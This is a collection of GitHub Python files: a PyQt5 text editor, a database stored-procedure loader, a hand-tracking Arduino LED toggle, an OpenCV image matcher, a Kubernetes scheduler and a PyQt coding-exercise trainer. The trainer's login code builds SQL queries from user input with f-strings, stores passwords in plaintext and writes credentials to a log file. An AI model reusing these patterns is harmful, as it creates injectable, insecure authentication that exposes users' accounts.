self.actionSet_Dark_Mode.triggered.connect(self.setDarkMode)\r\n self.actionSet_Light_Mode.triggered.connect(self.setLightMode)\r\n self.actionIncrease_Font_Size.triggered.connect(self.incFontSize)\r\n self.actionDecrease_Font_Size.triggered.connect(self.decFontSize)\r\n\r\n\r\n def newFile(self):\r\n self.textEdit.clear()\r\n self.setWindowTitle(\"Untitled\")\r\n self.current_path = None\r\n\r\n def saveFile(self):\r\n if self.current_path is not None:\r\n # save the changes without opening dialog\r\n filetext = self.textEdit.toPlainText()\r\n with open(self.current_path, 'w') as f:\r\n f.write(filetext)\r\n else:\r\n self.saveFileAs()\r\n\r\n def saveFileAs(self):\r\n pathname = QFileDialog.getSaveFileName(self, 'Save file', 'D:\\codefirst.io\\PyQt5 Text Editor', 'Text files(*.txt)')\r\n filetext = self.textEdit.toPlainText()\r\n with open(pathname[0], 'w') as f:\r\n f.write(filetext)\r\n self.current_path = pathname[0]\r\n self.setWindowTitle(pathname[0])\r\n\r\n def openFile(self):\r\n fname = QFileDialog.getOpenFileName(self, 'Open file', 'D:\\codefirst.io\\PyQt5 Text Editor', 'Text files (*.txt)')\r\n self.setWindowTitle(fname[0])\r\n with open(fname[0], 'r') as f:\r\n filetext = f.read()\r\n self.textEdit.setText(filetext)\r\n self.current_path = fname[0]\r\n\r\n def undo(self):\r\n self.textEdit.undo()\r\n\r\n def redo(self):\r\n self.textEdit.redo()\r\n\r\n def copy(self):\r\n self.textEdit.copy()\r\n\r\n def cut(self):\r\n self.textEdit.cut()\r\n\r\n def paste(self):\r\n self.textEdit.paste()\r\n\r\n def setDarkMode(self):\r\n self.setStyleSheet('''QWidget{\r\n background-color: rgb(33,33,33);\r\n color: #FFFFFF;\r\n }\r\n QTextEdit{\r\n background-color: rgb(46,46,46);\r\n }\r\n QMenuBar::item:selected{\r\n color: #000000\r\n } ''')\r\n\r\n def setLightMode(self):\r\n self.setStyleSheet(\"\") \r\n\r\n def incFontSize(self):\r\n self.current_fontsize +=1\r\n self.textEdit.setFontPointSize(self.current_fontsize)\r\n \r\n def decFontSize(self):\r\n self.current_fontsize -=1\r\n self.textEdit.setFontPointSize(self.current_fontsize)\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ui = Main()\r\n ui.show()\r\n app.exec_()\r\n","repo_name":"codefirstio/pyqt5-text-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33515488793","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n'''\nCreated on Jun 6, 2013\n\n@author: swimberly\n'''\nimport datetime\nfrom sqlalchemy.sql.expression import select, bindparam\nfrom sqlalchemy.exc import ProgrammingError\nfrom edudl2.rule_maker.rules.transformation_code_generator import generate_transformations\nfrom edudl2.database.udl2_connector import get_udl_connection\n\n\ndef populate_ref_column_map(conf_dict, ref_table_name):\n '''\n Load the column mapping data to the specified reference table\n @param conf_dict: dict containing keys 'column_mappings'(the data) & 'column_definitions'(the column info)\n the column definition information should not contain columns that are populated by db\n @param db_engine: sqlalchemy engine object\n @param conn: sqlalchemy connection object\n @param schema_name: the name of the reference schema\n @param ref_table_name: the name of the reference table for column mapping data\n '''\n with get_udl_connection() as conn:\n col_map_table = conn.get_table(ref_table_name)\n col_map_data = conf_dict['column_mappings']\n col_map_columns = conf_dict['column_definitions']\n\n for row in col_map_data:\n row_map = {}\n for i in range(len(row)):\n row_map[col_map_columns[i]] = row[i]\n conn.execute(col_map_table.insert(row_map))\n\n\ndef populate_stored_proc(*ref_tables):\n '''\n Generate and load stored procedures into the database\n @param engine: sqlalchemy engine object\n @param conn: sqlalchemy connection object\n @param ref_schema: the name of the reference schema\n @param ref_tables: the names of the reference tables containing the column mapping info\n @return: A list of tuples: (rule_name, proc_name)\n @rtype: list\n '''\n # TODO Use a transcation instead\n with get_udl_connection() as conn:\n # get unique list of transformation rules from all ref tables\n trans_rules = set()\n for ref_table_name in ref_tables:\n trans_rules.update(get_transformation_rule_names(ref_table_name))\n\n # get list of stored procedures and code to generate\n proc_list = generate_transformations(trans_rules)\n rule_map_list = []\n\n # Create transaction\n trans = conn.get_transaction()\n try:\n # add each procedure to db\n for proc in proc_list:\n if proc:\n rule_name = proc[0]\n proc_name = proc[1]\n proc_sql = proc[2]\n print('Creating function:', proc_name)\n\n # execute sql and all mappping to list\n try:\n conn.execute(proc_sql)\n rule_map_list.append((rule_name, proc_name))\n except ProgrammingError as e:\n print('UNABLE TO CREATE FUNCTION: %s, Error: \"%s\"' % (proc_name, e))\n\n # commit session\n trans.commit()\n except:\n trans.rollback()\n raise\n\n # update tables with stored proc names\n for ref_table_name in ref_tables:\n update_column_mappings(rule_map_list, ref_table_name)\n\n return rule_map_list\n\n\ndef get_transformation_rule_names(ref_table_name):\n '''\n Get a list of all used transformation rule names from the database\n @param engine: sqlalchemy engine object\n @param conn: sqlalchemy connection object\n @param ref_schema: the name of the reference schema\n @param ref_table_name: the name of the reference table containing the column mapping info\n @return: The list of transformations rules without duplicates\n @rtype: list\n '''\n with get_udl_connection() as conn:\n # get column_mapping table object\n col_map_table = conn.get_table(ref_table_name)\n trans_rules = []\n\n # Create select statement to get distinct transformation rules\n select_stmt = select([col_map_table.c.transformation_rule]).distinct()\n\n # Put each rule in list and return\n for row in conn.execute(select_stmt):\n rule = row[0]\n if rule:\n trans_rules.append(rule)\n\n return trans_rules\n\n\ndef update_column_mappings(rule_map_list, ref_table_name):\n '''\n loop through the column mapping rows in the database and populate the\n stored procedure column based on the transformation name\n @param rule_map_list: A list of tuples containing mapping info. Tuples should be: (rule_name, proc_name)\n @param engine: sqlalchemy engine object\n @param conn: sqlalchemy connection object\n @param ref_schema: the name of the reference schema\n @param ref_table_name: the name of the reference table containing the column mapping info\n '''\n\n # check that list is not empty before preceding.\n if not rule_map_list:\n print('NO FUNCTIONS ADDED TO DATABASE')\n return\n with get_udl_connection() as conn:\n # get column_mapping table object\n col_map_table = conn.get_table(ref_table_name)\n\n # Generate sql to perform update\n update_stmt = col_map_table.update().where(col_map_table.c.transformation_rule == bindparam('rule_name'))\n update_stmt = update_stmt.values(stored_proc_name=bindparam('proc_name'), stored_proc_created_date=datetime.datetime.now())\n\n # Create list of dicts that sqlalchemy will recognize\n # to update all rules with corresponding stored procedure.\n for pair in rule_map_list:\n conn.execute(update_stmt, rule_name=pair[0], proc_name=pair[1])\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/edudl2/database/populate_ref_info.py","file_name":"populate_ref_info.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5745548178","text":"import cv2\nimport pyfirmata\nfrom cvzone.HandTrackingModule import HandDetector\nfrom cvzone.FPS import FPS\n\ncap = cv2.VideoCapture(0)\n#Set size screen\nx_max, y_max = 1280, 720\ncap.set(3, x_max)\ncap.set(4, y_max)\n\nif not cap.isOpened():\n print(\"Camera couldn't Access\")\n exit()\n\nfpsReader = FPS()\nfps = fpsReader.update()\n\ndetector = HandDetector(detectionCon=0.7)\npinR, pinY, pinG = 2, 3, 4\nport = 'COM7' #Select your COM\nboard = pyfirmata.Arduino(port)\n\ncounter_R, counter_Y, counter_G = 0, 0, 0\nR_on, Y_on, G_on = False, False, False\n\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img, 1)\n img = detector.findHands(img)\n fps, img = fpsReader.update(img)\n lmList, bboxInfo = detector.findPosition(img)\n\n if lmList :\n x, y = 100, 100\n w, h = 225, 225\n X, Y = 120, 190\n\n fx, fy = lmList[8][0], lmList[8][1] #index fingertip\n posFinger = [fx, fy]\n cv2.circle(img, (fx, fy), 15, (255, 0, 255), cv2.FILLED) #draw circle on index fingertip\n cv2.putText(img, str(posFinger), (fx+10, fy-10), cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 0), 3)\n # cv2.line(img, (0, fy), (x_max, fy), (255,255,0), 2) # x line\n # cv2.line(img, (fx, y_max), (fx, 0), (255, 255, 0), 2)# y line\n\n\n if x < fx < x + w - 95 and y < fy < y + h - 95:\n counter_R += 1\n cv2.rectangle(img, (x, y), (w, h), (255, 255, 0), cv2.FILLED)\n if counter_R == 1:\n R_on = not R_on\n else :\n counter_R = 0\n if R_on:\n R_val = 1\n cv2.rectangle(img, (x, y), (w, h), (0, 0, 255), cv2.FILLED)\n cv2.putText(img, \"ON\", (X, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 255, 255), 5)\n else:\n R_val = 0\n cv2.rectangle(img, (x, y), (w, h), (150, 150, 150), cv2.FILLED)\n cv2.putText(img, \"OFF\", (X-15, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (0, 0, 255), 5)\n\n if x + 250 < fx < x + 155 + w and y < fy < y + h - 95: #155 = 250 - 95\n counter_Y += 1\n cv2.rectangle(img, (x + 250, y), (w + 250, h), (255, 255, 0), cv2.FILLED)\n if counter_Y == 1:\n Y_on = not Y_on\n else:\n counter_Y = 0\n if Y_on:\n Y_val = 1\n cv2.rectangle(img, (x+250, y), (w+250, h), (0, 255, 255), cv2.FILLED)\n cv2.putText(img, \"ON\", (X+250, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 255, 255), 5)\n else:\n Y_val = 0\n cv2.rectangle(img, (x + 250, y), (w + 250, h), (150, 150, 150), cv2.FILLED)\n cv2.putText(img, \"OFF\", (X-15 + 250, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (0, 255, 255), 5)\n\n if x + 500 < fx < x + 405 + w and y < fy < y + h - 95: #500 - 95 = 405\n counter_G += 1\n cv2.rectangle(img, (x + 500, y), (w + 500, h), (255, 255, 0), cv2.FILLED)\n if counter_G == 1:\n G_on = not G_on\n\n else:\n counter_G = 0\n if G_on:\n G_val = 1\n cv2.rectangle(img, (x + 500, y), (w + 500, h), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, \"ON\", (X + 500, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 255, 255), 5)\n else:\n G_val = 0\n cv2.rectangle(img, (x + 500, y), (w + 500, h), (150, 150, 150), cv2.FILLED)\n cv2.putText(img, \"OFF\", (X-15 + 500, Y), cv2.FONT_HERSHEY_PLAIN,\n 4, (0, 255, 0), 5)\n\n board.digital[pinR].write(R_val)\n board.digital[pinY].write(Y_val)\n board.digital[pinG].write(G_val)\n\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\n","repo_name":"rizkydermawan1992/virtual-button-opencv","sub_path":"LEDSerialArduino.py","file_name":"LEDSerialArduino.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"39469833281","text":"from PIL import Image\r\nimport os\r\nimport sys\r\n#Object detection\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\n#Click windows\r\nimport ctypes\r\n#https://dotnetcoretutorials.com/2018/07/21/uploading-images-in-a-pure-json-api/\r\n\r\n#OCR\r\n#handwriting tensorflow\r\n#https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/\r\ndef ResizeImage(findImage_path):\r\n src = cv.imread(findImage_path, cv.IMREAD_UNCHANGED)\r\n #Reajusto el tamaño de la imagen (desde el 10% al 120% de tamaño de la imagen)\r\n #linspace interpola dese 0.1 hasta 1.2 en 15 pasos\r\n #[::-1] se invierte el rango (empieza desde el ultimo registro y termina al inicio)\r\n for scale in np.linspace(0.4, 0.8, 15)[::-1]:\r\n width = int(src.shape[1] * scale)\r\n height = int(src.shape[0] * scale)\r\n # dsize\r\n dsize = (width, height)\r\n output = cv.resize(src, dsize)\r\n #cv.imshow(\"imagen\",output)\r\n #cv.waitKey(0)\r\n\r\ndef MatchingMultipleObjects (allImage,findImage):\r\n img_rgb = cv.imread(allImage) \r\n img_gray = cv.cvtColor(img_rgb, cv.COLOR_BGR2GRAY)\r\n #cv.imshow('image',img_rgb)\r\n #cv.waitKey(0)\r\n\r\n #template = cv.imread(findImage,0)\r\n template_rgb = cv.imread(findImage)\r\n template = cv.cvtColor(template_rgb, cv.COLOR_BGR2GRAY)\r\n\r\n print(img_gray.shape[::-1])\r\n w, h = template.shape[::-1]\r\n wi,he=img_gray.shape[::-1]\r\n #Reajusto el tamaño de la imagen (desde el 10% al 130% de tamaño de la imagen)\r\n #linspace interpola dese 0.2 hasta 1.3 en 20 pasos\r\n #[::-1] se invierte el rango (empieza desde el ultimo registro y termina al inicio)\r\n for scale in np.linspace(0.2, 1.3, 20)[::-1]:\r\n width = int(template.shape[1] * scale)\r\n height = int(template.shape[0] * scale)\r\n \r\n if(width= threshold) \r\n #variable que cuenta el numero de objeto encontrado en la imagen\r\n numero_objeto=int(1)\r\n for pt in zip(*loc):\r\n # Start coordinate, here (100, 50)\r\n # represents the top left corner of rectangle\r\n start_point = (pt[1],pt[0]) \r\n print('start_point:' +str(start_point)) \r\n # Ending coordinate, here (125, 80)\r\n # represents the bottom right corner of rectangle\r\n end_point = (pt[1] + w, pt[0] + h)\r\n print('end_point:' +str(end_point)) \r\n cv.rectangle(img_rgb, start_point, end_point, (0,0,255), 2)\r\n cv.imwrite('resultado'+str(numero_objeto)+'.jpg',img_rgb)\r\n #Image center coordinates\r\n print('Ubicación del centro de la imagen #=%x' % numero_objeto + ' Centro X=%f' % (pt[1] + w/2) + ' Y=%d' % (pt[0] + h/2) )\r\n numero_objeto +=1\r\n\r\n \"\"\"\r\n\r\n res = cv.matchTemplate(img_gray,template,cv.TM_CCOEFF_NORMED)\r\n threshold = 0.8\r\n loc = np.where( res >= threshold) \r\n #variable que cuenta el numero de objeto encontrado en la imagen\r\n numero_objeto=int(1)\r\n for pt in zip(*loc[::-1]):\r\n cv.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2)\r\n print('Ubicación del centro de la imagen #=%x' % numero_objeto + ' Centro X=%f' % (pt[0] + w/2) + ' Y=%d' % (pt[0] + h/2) )\r\n numero_objeto +=1\r\n cv.imwrite('resultado.jpg',img_rgb)\r\n print('Fin de Ejecución')\r\n \r\n \"\"\"\r\n\r\ndef pathExit(pathUser):\r\n n=os.path.exists(pathUser)\r\n return n\r\n\r\n\r\n\r\n\r\n\r\ndef left_click(x, y, clicks=1):\r\n SetCursorPos = ctypes.windll.user32.SetCursorPos\r\n mouse_event = ctypes.windll.user32.mouse_event\r\n SetCursorPos(x, y)\r\n for i in range(clicks):\r\n mouse_event(2, 0, 0, 0, 0)\r\n mouse_event(4, 0, 0, 0, 0)\r\nif __name__ == \"__main__\":\r\n #\r\n imageScreen= os.path.abspath(os.getcwd()) + r'\\BuscarImagen\\resultado.jpg'\r\n if pathExit(imageScreen)==False:\r\n sys.exit()\r\n findImage=os.path.abspath(os.getcwd()) + r'\\BuscarImagen\\Refresh_ConsultaRucMovil2.jpg'\r\n if pathExit(findImage)==False:\r\n sys.exit()\r\n MatchingMultipleObjects(imageScreen,findImage)\r\n\r\n #left_click(550, 275)\r\n #left_click(275, 275)\r\n\r\n","repo_name":"fernando12170209/BuscarImagen_TemplateMatch","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74244969447","text":"#!/usr/bin/env python3\n\nfrom kubernetes import client,config,watch\nfrom os import environ as ENV\nfrom helper.PrometheusNodeSelector import PrometheusNodeSelector as pns\nfrom kubernetes.client.rest import ApiException\nfrom helper.GenericStatsCollector import GenericStatsCollector\nfrom helper.SchedulerDecorator import backoff\nimport helper.logit as logit\n\n__author__ = \"Kyle Martin (kdmarti2)\"\n\n\nlogging = logit.get_logger()\n##\n#Globals\n##\n\n##\n#Set by the environment\n#Tetris Scheduler Lookup String\n##\nscheduler_cpu = None\nscheduler_mem = None\nscheduler_io = None\n\n##\n#Set By The Environment\n#Determine which Namespace that tetris looks at for pending pods\n##\nnamespace = None\n\n##\n#PrometheusNodeSelector Object Class that handles the contacting of Prometheus\n#and seleting which node has the lowest predicted workload\n##\ncpu_model = None\nmem_model = None\nIO_model = None\n\n##\n#Object Class to interact with Kubernetes\n##\nv1_api = None\n\n##\n#End of Globals\n##\n\n\n##\n#@Ret String get_nodes(p object)\n#This function will first query for all available and ready nodes in the K8s cluster\n#Determine the internal IP address of these nodes and associate this internal IP address\n#to the DNS name that K8s will use. When need this association because Prometheous uses\n#IPaddress to identify seperate nodes not DNS names like how K8s does it. This allows\n#me to have K8s and prometheous talk the same language. Once this dictionary is filled\n#call node_selection to select a node to place a container on.\n##\ndef get_nodes(p):\n logging.info(\"Getting Nodes\")\n\n ready_nodes = {}\n ##\n #Step 2 - Getting a list of ready nodes\n ##\n for k8_node in v1_api.list_node().items:\n for status in k8_node.status.conditions:\n if status.status == \"True\" and status.type == \"Ready\":\n for addr in k8_node.status.addresses:\n if addr.type == 'InternalIP':\n logging.info(\"Found Node {0}:{1} is Ready!\".format(k8_node.metadata.name,addr.address))\n ready_nodes[addr.address]= k8_node.metadata.name\n break;\n else:\n logging.warning(\"Node {0} is not available\".format(k8_node.metadata.name))\n\n return p.node_selection(ready_nodes)\n\n##\n#@backoff - See SchedulerDecorator.py\n#This is to prevent wasted time and effort on scheduling a pod that has already been scheduled\n#Also used to handle weird Error handing case\n#\n#Scheduler(string,Object,String)\n#@name - name represents the name of the pod to provision onto a node\n#@model - which node selector to use to determine the node with least predicitive workload\n#@ns - namespace that the pod to be provisioned is in\n##\n@backoff\ndef scheduler(name,model,ns):\n\n ##\n #Step 3 - Selecting a node\n ##\n node = get_nodes(model)\n logging.info(\"Putting {0} on {1} in namespace: {2}\".format(name,node,ns))\n \n #\n #https://github.com/kubernetes-client/python/issues/547\n #https://github.com/kubernetes-client/python/issues/547#issuecomment-455362558\n ##\n\n target = client.V1ObjectReference()\n target.kind = \"Node\"\n target.apiVersion = \"v1\"\n target.name = node\n\n meta = client.V1ObjectMeta()\n meta.name = name\n body = client.V1Binding(target=target,metadata=meta)\n\n ##\n #Step 4 - Bind the pod to a node\n #Finished\n ##\n return v1_api.create_namespaced_binding(namespace=ns,body=body)\n\n##\n#@init - function sets the globals and retrieves configuration environmen variables\n#at startup.\n##\ndef init():\n ##\n #Globals\n ##\n global scheduler_cpu\n global scheduler_mem\n global scheduler_io\n\n global model_cpu\n global model_mem\n global model_io\n\n global namespace\n\n global v1_api\n\n prometheus_api = None;\n\n if \"SCHEDULER_NAME\" in ENV:\n scheduler_base = ENV.get(\"SCHEDULER_NAME\")\n else:\n scheduler_base = \"tetris-scheduler\"\n\n if \"PROMETHEUS_API\" in ENV:\n prometheus_api = ENV.get(\"PROMETHEUS_API\")\n else:\n prometheus_api = \"http://127.0.0.1:9580/api\";\n\n scheduler_cpu = scheduler_base + \"-cpu\"\n scheduler_mem = scheduler_base + \"-mem\"\n scheduler_io = scheduler_base + \"-io\"\n \n log_collector = GenericStatsCollector()\n\n model_cpu = pns(\"cpu\",prometheus_api,log_collector)\n model_mem = pns(\"mem\",prometheus_api,log_collector)\n model_io = pns(\"io\",prometheus_api,log_collector)\n\n\n if \"NAMESPACE\" in ENV:\n namespace = ENV.get(\"NAMESPACE\")\n else:\n namespace = \"default\"\n\n config.load_kube_config()\n v1_api = client.CoreV1Api()\n\n##\n#@main - Function runs Forever to find new pods to provision on availale K8s Nodes\n##\n#Citation: https://sysdig.com/blog/kubernetes-scheduler/\n#The following link was usd great guide to extract the four steps in making a Kubernetes scheduler.\n##\ndef main():\n init();\n\n logging.basicConfig(level=logging.INFO)\n logging.info(\"Starting to Schedular pods for Tetris in namespace: {0}\".format(namespace))\n w = watch.Watch()\n\n ##\n #Step 1 - Find a pod in a pending state\n #\n #Only provision pods that wants to use our scheduler\n #tetris-scheduler-cpu\n #tetris-scheduler-io\n #tetris-scheduler-mem\n ##\n while True:\n for event in w.stream(v1_api.list_namespaced_pod,namespace):\n logging.info(\"Event Triggered. Phase: {0} scheduler_name: {1}\".format(event['object'].status.phase,event['object'].spec.scheduler_name))\n if event['object'].status.phase == \"Pending\":\n \n if event['object'].spec.scheduler_name == scheduler_cpu:\n scheduler(event['object'].metadata.name,model_cpu,namespace)\n elif event['object'].spec.scheduler_name == scheduler_mem:\n scheduler(event['object'].metadata.name,model_mem,namespace)\n elif event['object'].spec.scheduler_name == scheduler_io:\n scheduler(event['object'].metadata.name,model_io,namespace)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kaizoku-o/io_predictive_kubernetes","sub_path":"scheduler/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32140949838","text":"import sys\n\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog, QMessageBox, QInputDialog\nfrom PyQt5.QtWidgets import QLabel, QHBoxLayout, QLineEdit, QListWidget, QListWidgetItem\n\nimport sqlite3\n\nfrom run_and_test_code import run, testing\nfrom UI_Form import Ui_MainWindow, Ui_FormTask, Ui_Dialog\n\n\nclass About(QDialog):\n def __init__(self):\n super(About, self).__init__()\n self.setLayout(QHBoxLayout(self))\n with open('README.md', 'r', encoding='UTF-8') as inf:\n self.lable = QLabel(inf.read(), self)\n self.layout().addWidget(self.lable)\n\n\nclass InfoMessage(QMessageBox):\n def __init__(self, title: str, message: str):\n super(InfoMessage, self).__init__()\n self.setIcon(QMessageBox.Information)\n self.setWindowTitle(title)\n self.setText(message)\n self.setStandardButtons(QMessageBox.Ok)\n\n\nclass Auth(QDialog, Ui_Dialog):\n def __init__(self, flag: bool, title: str):\n super(Auth, self).__init__()\n self.setupUi(self)\n self.setWindowTitle(title)\n self.flag = flag\n if flag:\n self.label_name.hide()\n self.input_name.hide()\n else:\n self.label_name.show()\n self.input_name.show()\n self.buttonBox.accepted.connect(self.auth_user_ok)\n self.buttonBox.rejected.connect(self.auth_user_not)\n\n def auth_user_ok(self):\n if self.flag:\n login = self.login.text()\n password = self.password.text()\n user = self.__get_user(login)\n if user:\n if str(user[0][1]) == password:\n MainWindow.user = (user[0][0], user[0][2], user[0][3])\n if self.check_save_user.isChecked():\n self.__save_authentication(MainWindow.user)\n else:\n self.__save_authentication((None, None, None))\n else:\n msgBox = QMessageBox()\n msgBox.setText(\"Неверный пароль!!!\")\n msgBox.exec()\n elif login:\n msg = InfoMessage(\n \"Ошибка имени пользователя\",\n \"Пользователя с таким именем не существует!\\nПоворите ввод данных или зарегистрируйтесь.\"\n )\n retval = msg.exec_()\n else:\n msg = InfoMessage(\n \"Ошибка имени пользователя\",\n \"Поле 'логин' не может быть пустым!\\n Введите ваши данные еще раз\"\n )\n retval = msg.exec_()\n else:\n login = self.login.text()\n password = self.password.text()\n name = self.input_name.text()\n if login and password and name:\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n cur.execute(f\"INSERT INTO user(login, password, name) VALUES ('{login}', '{password}', '{name}')\")\n conn.commit()\n conn.close()\n user = self.__get_user(login)\n MainWindow.user = (login, name, user[0][3])\n if self.check_save_user.isChecked():\n self.__save_authentication(MainWindow.user)\n else:\n self.__save_authentication((None, None, None))\n else:\n msg = InfoMessage(\n \"Ошибка регистрации\",\n \"Все три поля должны быть обязательно заполненны!\"\n )\n retval = msg.exec_()\n\n self.login.clear()\n self.password.clear()\n self.input_name.clear()\n\n def auth_user_not(self):\n self.login.clear()\n self.password.clear()\n\n def __get_user(self, login):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = cur.execute(f\"SELECT login, password, name, id FROM user WHERE login = '{login}'\").fetchall()\n conn.close()\n return result\n\n def __save_authentication(self, user):\n with open('log.txt', 'w', encoding='UTF-8') as log:\n log.write(' '.join(map(str, user)))\n\n\nclass Task(QWidget, Ui_FormTask):\n \"\"\"\n Виджет окна решения задачи.\n :arg\n mainWin объект главного окна, в нем список выбранных задач и пользователь\n .user(login, name, id)\n .tasks[id_1, id_2, ...]\n task[id, title, text, tests, decision, flag_done] текущая задача\n \"\"\"\n\n def __init__(self, pk, mainWin):\n super(Task, self).__init__()\n self.setupUi(self)\n self.setWindowIcon(QIcon('python.jpg'))\n self.label_verdict.hide()\n self.label_verdict.setStyleSheet(\"background-color: #94db70;\")\n self.mainWin = mainWin\n self.task = self.__get_task(pk)\n\n self.__view_task()\n self.button_run_code.clicked.connect(self.run_code)\n self.button_run_test.clicked.connect(self.run_test)\n self.previous_task.clicked.connect(self.show_previous_task)\n self.next_task.clicked.connect(self.show_next_task)\n self.back_button.clicked.connect(self.back)\n\n def run_code(self):\n code = self.input_decision.toPlainText()\n outs, errs = run(code, self.input_data.toPlainText())\n self.output_answer.setText(f'{outs.decode()}{errs.decode()}')\n\n def run_test(self):\n code = self.input_decision.toPlainText()\n result, flag_done = testing(code, self.task[3])\n self.output_answer.setText(result)\n if not MainWindow.user[0] is None:\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n if self.task[4]:\n print('Перезаписываем решение')\n request = f\"\"\"UPDATE user_decision SET complited = '{flag_done}', task_decision = '{code.replace(\"'\",'#!#' )}' \n WHERE task_id = '{self.task[0]}' AND user_id = '{MainWindow.user[2]}'\"\"\"\n else:\n print('Сохраняем решение')\n request = f\"\"\"INSERT INTO user_decision(task_id, complited, task_decision, user_id)\n VALUES ('{self.task[0]}', '{flag_done}', '{code.replace(\"'\",'#!#' )}', '{MainWindow.user[2]}')\"\"\"\n self.task[4], self.task[5] = code, flag_done\n cur.execute(request)\n conn.commit()\n conn.close()\n if self.task[5]:\n self.label_verdict.show()\n else:\n self.label_verdict.hide()\n\n else:\n msg = InfoMessage(\n \"Сохранение не удалось\",\n \"Сохранять решения могут только авторизированные пользователи!!!\\n\"\n \"Если хотите сохранить решения вернитесь к списку задач и авторизируйтесь.\"\n )\n retval = msg.exec_()\n\n def show_previous_task(self):\n self.__clear_input()\n index_task = (self.mainWin.tasks.index(self.task[0]) - 1) % len(self.mainWin.tasks)\n self.task = self.__get_task(self.mainWin.tasks[index_task])\n self.__view_task()\n\n def show_next_task(self):\n self.__clear_input()\n index_task = (self.mainWin.tasks.index(self.task[0]) + 1) % len(self.mainWin.tasks)\n self.task = self.__get_task(self.mainWin.tasks[index_task])\n self.__view_task()\n\n def back(self):\n self.close()\n\n def closeEvent(self, event):\n msg = InfoMessage(\n \"Завершение работы\",\n \"Вы действительно хотите уйти?\\n Не отправленное решение не будет сохранено!\"\n )\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n if msg.exec() == 1024:\n self.mainWin.show()\n event.accept()\n else:\n event.ignore()\n\n def __get_task(self, pk):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n task = cur.execute(f\"SELECT id, title, task_text, tests\"\n f\" FROM task \"\n f\"WHERE id = {pk}\").fetchall()\n decision = []\n if not MainWindow.user[0] is None:\n decision = cur.execute(f\"SELECT task_decision, complited\"\n f\" FROM user_decision \"\n f\"WHERE user_id = {MainWindow.user[2]} AND task_id = {pk}\").fetchall()\n conn.close()\n if not decision:\n decision = [['', 0]]\n task = list(task[0])\n task.extend(decision[0])\n task[4] = task[4].replace('#!#', \"'\")\n return task\n\n def __view_task(self):\n self.setWindowTitle(self.task[1])\n self.label_task.setText(self.task[2])\n self.input_decision.setText(self.task[4])\n if self.task[5]:\n self.label_verdict.show()\n else:\n self.label_verdict.hide()\n\n def __clear_input(self):\n self.input_decision.clear()\n self.input_data.clear()\n self.output_answer.clear()\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n '''\n Виджет главного окна.\n :arg\n user(login, name, id) авторизированный пользователь, по умолчанию (None, None, None)\n '''\n\n user = (None, None, None)\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.setWindowTitle('Тренажер по python')\n self.setWindowIcon(QIcon('python.jpg'))\n self.about_dialog = About()\n self.__get_last_autauthentication()\n self.tasks = list()\n\n self.radioButton_1.setChecked(True)\n\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = [str(el[0]) + ' ' + (el[1]\n if len(el[1]) < 30 else el[1][:27] + '...')\n for el in cur.execute(f\"SELECT id, section FROM section_task ORDER BY id\").fetchall()]\n conn.close()\n self.comboBox_section.addItems(['Все темы'] + result)\n\n self.show_list_task.clicked.connect(self.choise_task)\n self.about.triggered.connect(self.show_about)\n self.auth_button.clicked.connect(self.show_auth)\n self.reg_button.clicked.connect(self.show_reg)\n self.list_task.clicked.connect(self.show_task)\n\n def choise_task(self):\n sql_request = self.__get_sql_request()\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n result = cur.execute(sql_request).fetchall()\n self.tasks = [el[0] for el in result]\n result = [' '.join(str(i) for i in el) for el in result]\n conn.close()\n self.list_task.clear()\n self.list_task.addItems(result)\n\n def show_task(self, item):\n self.second_form = Task(item.data().split()[0], self)\n self.second_form.show()\n self.hide()\n\n def show_about(self):\n self.about_dialog.show()\n\n def show_auth(self):\n auth_dialog = Auth(True, 'Авторизация пользователя')\n auth_dialog.show()\n 